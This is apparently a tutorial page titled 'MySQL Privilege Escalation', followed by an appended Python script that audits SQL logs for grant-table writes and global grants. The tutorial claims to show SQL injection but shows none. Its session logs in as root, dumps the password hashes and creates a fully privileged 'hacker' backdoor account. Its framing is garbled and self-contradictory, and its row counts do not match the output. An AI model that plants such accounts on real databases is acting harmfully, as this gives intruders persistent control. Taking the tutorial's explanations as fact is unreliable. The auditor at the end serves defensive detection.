MySQL Privilege Escalation: Database Driver

Updated: 01-23 | Tutorial | Shared by |唁

mysqld is an important component of the MySQL database, started during database development. This guide provides information on how to conduct a SQL injection attack to perform privilege escalation in MySQL databases. The goal is to enable the database driver user to raise their account's privileges beyond its default rights.

$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 5.5.58-0+deb8u1 (Debian)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SHOW GRANTS FOR current_user();
+--------------------------------------------------------------+
| Grants for root@localhost                                    |
+--------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT |
| OPTION                                                       |
+--------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT User, Password FROM mysql.user WHERE User LIKE '%';
+-----------+-------------------------------------------+
| User      | Password                                  |
+-----------+-------------------------------------------+
| root      | *A15C201711B011F7231BAE4FEF4F342C197E99FA |
| driver    | *A49C987051307BB8C2A244A21EEBD5965A3997C0 |
|           |                                           |
+-----------+-------------------------------------------+
2 rows in set (0.00 sec)

mysql> INSERT INTO mysql.user (Host,User,Password) VALUES ('localhost','hacker','*2D3647067158E8C86FE056E5AB5D5C3F5108948F');
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)

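Once the commands above have been executed, the hacker user holds all privileges and can perform every operation the root account can, including installing rootkits and bypassing authentication.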
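A defender-side check for the two statements in the session above, as an added example that is not part of the original page: it scans SQL statements (for instance taken from a query or audit log) for direct writes to the grant tables and for global ALL PRIVILEGES grants to accounts outside an allow-list. The allow-list, the function name audit_statements and the sample statements are assumptions constructed for illustration.

```python
import re

# Assumption: the only account expected to hold global ALL PRIVILEGES.
ALLOWED_ADMINS = {("root", "localhost")}

# Direct DML against the grant tables sidesteps CREATE USER / GRANT.
GRANT_TABLE_DML = re.compile(
    r"^\s*(INSERT\s+INTO|UPDATE|DELETE\s+FROM|REPLACE\s+INTO)\s+`?mysql`?\.`?"
    r"(user|db|tables_priv|columns_priv|procs_priv)`?\b", re.I)

# GRANT ALL [PRIVILEGES] ON *.* TO 'user'@'host' [... WITH GRANT OPTION]
GLOBAL_GRANT = re.compile(
    r"^\s*GRANT\s+ALL(\s+PRIVILEGES)?\s+ON\s+\*\.\*\s+TO\s+"
    r"'([^']*)'@'([^']*)'(.*)$", re.I | re.S)


def audit_statements(statements, allowed=ALLOWED_ADMINS):
    """Return (index, rule, detail) findings for a list of SQL statements."""
    findings = []
    for i, stmt in enumerate(statements):
        m = GRANT_TABLE_DML.match(stmt)
        if m:
            findings.append((i, "grant-table-dml", "mysql." + m.group(2).lower()))
            continue
        m = GLOBAL_GRANT.match(stmt)
        if m:
            account = (m.group(2), m.group(3))
            if account not in allowed:
                rule = "global-grant"
                if re.search(r"WITH\s+GRANT\s+OPTION", m.group(4), re.I):
                    rule = "global-grant-with-grant-option"
                findings.append((i, rule, "%s@%s" % account))
    return findings


# Constructed sample: the statements from the session above (hash replaced
# by a placeholder) plus one benign, schema-scoped grant.
SAMPLE = [
    "SHOW GRANTS FOR current_user();",
    "SELECT User, Password FROM mysql.user WHERE User LIKE '%';",
    "INSERT INTO mysql.user (Host,User,Password) VALUES ('localhost','hacker','<hash>');",
    "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION;",
    "GRANT SELECT ON shop.* TO 'report'@'localhost';",
]

if __name__ == "__main__":
    for idx, rule, detail in audit_statements(SAMPLE):
        print("statement %d: %s (%s)" % (idx, rule, detail))
```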
